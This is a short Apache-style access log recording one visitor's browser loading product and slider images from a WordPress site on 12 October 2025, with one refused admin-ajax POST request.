205.169.39.51 - - [12/Oct/2025:08:49:05 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:05 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:05 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:05 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:05 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:07 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:08 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:10 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [12/Oct/2025:08:49:10 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
